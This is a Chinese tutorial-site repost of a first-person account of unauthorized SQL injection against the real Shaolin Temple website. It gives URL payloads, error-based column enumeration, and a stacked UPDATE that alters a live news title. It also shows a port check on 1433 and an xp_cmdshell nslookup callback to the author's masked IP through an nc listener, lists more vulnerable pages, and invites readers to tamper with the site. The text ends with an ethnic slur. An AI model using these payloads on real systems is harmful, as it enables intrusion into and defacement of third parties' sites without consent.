我的一亩三分地 我就喜欢!
13fen  设为主页
 收藏本站
 
当前位置: > 一亩三分地:首页 > 网络学院 > 网络编程 > ASP专区 > Asp未分类 > 对少林寺网站的sql注入渗透
热门文章排行
热门文章排行 手推车”功能的实现(10-07)
八大法则防范ASP网站漏洞(10-23)
ASP教程十一、调试ASP脚本(10-23)
在JSP中访问数据库大全(10-23)
虚机服务中常见Asp.Net低级错误一览(03-21)
精采文章排行
精采文章排行 ASP.NET实现抓取网页中的链接(11-15)
ASP连接数据库的11种方法(11-10)
如何动态创建网页的RSS内容摘要(11-10)
ASP网站漏洞及入侵防范方法(11-10)
ASP自定义函数:对字符串正则替换(11-10)
技术专题推荐
网管论坛交流
 

对少林寺网站的sql注入渗透 

作者:佚名   来源:一亩三分地   点击:   日期:2007-03-30
刚才从新闻上听到一条消息:少林网站公布武功秘笈;呵呵!这个比较爽!
  顺便就去少林寺的网站上看了看,http://www.shaolin.org.cn/
  打开后,看到有新闻系统,随意浏览了一下几条新闻,都是html的,似乎没什么问题,但是当我把鼠标放到首页新闻上时,发现他的连接是“javascript:MM_openBrWindow('../../../asp/news_article.asp?
NewsID=649','news','scrollbars=yes,width=520,height=400')”,大家可能注意到了,有可能存在注入,我也是没事看电视,那就渗透一下试试。
  1、输入地址:
  http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649,
  可以打开新闻,说明url正确,加'后,返回
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
Unclosed quotation mark before the character string '''.
/asp/lib/lib.asp,行710
----------------------------------------------------------------------------------
  应该是sql数据库。
  2、使用' having 1=1—,提示
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
Column 'Shaolin_NewsList.NewsID' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
/asp/lib/lib.asp,行710
----------------------------------------------------------------------------------
  很快就能获得它的表shaolin_newslist的所有字段:newsid、NewsUpdateDat、NewsTitle、NewsContent
  3、接下来我测试了一下数据库用户权限
http://www.shaolin.org.cn/asp/news_article.asp?NewsID=649';
update%20shaolin_newslist%20set%20NewsTitle='少林药局数百医疗养生秘方首次向世界公开!'%20where%20newsid=649--
  图:
<p><img src="http://www.coolersky.com/Images/webpage/20040808001.JPG"
alt="照片.JPG (663395 bytes)" width="527" height="234"></p>


  看来对表有完整权限,可以增删改
  4、接着看1433开没
  telnet www.shaolin.org.cn 1433
  看来开着
  5、那试试数据库操作员的权限
  本地监听udp 53:Nc –u –l –p 53
  然后访问:
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649';
exec master.dbo.xp_cmdshell 'nslookup a.com *.*.*.*'--
  *为我的ip地址,
  没有反应,那么应该不是sysadmin权限了
  看来权限就是这些,因为没有系统的收集信息,也不打算怎么样,就到此为止!其实还有很多页面都存在这个问题,比如:
  http://www.shaolin.org.cn/html/html/wu/menu4.htm
  http://www.shaolin.org.cn/html/html/wu/teach_wushu.asp
  中传递参数的位置,看见那些绝世武功了吗?如果你愿意,可以给他添一条“XXX”什么的,呵呵!
  其实,在1年前就用过类似方法测试过本地比较大的几个信息港,随后就给他们提交了漏洞报告,但是到现在漏洞还在那里摆着,为了不给自己惹麻烦,至今也没有公布出来,还是等他们修补了,我再公布细节吧!
====================================================================================================
  发给网管没反应,在bbs上,我注册coolersky后,死活没有找到怎么发帖,没辙!听天由命吧,最好不要被小日本搞定!




文章评论】 【收藏本文】 【推荐好友】 【打印本文】 【论坛讨论

   相关文章:
·给你的FileSystemObject对象加把锁 ·在 Web 页上使用条件数值格式
·连接数据库查询手册(不仅仅适用于asp) ·警惕"给你的FileSystemObject对象加把锁"
·用ASP做全文检索 ·如何把ASP编写成DLL

   文章评论:(条)
  
 请留名: 匿名评论   点击查看所有评论 网管论坛
 

  责任编辑:一分  声明:刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。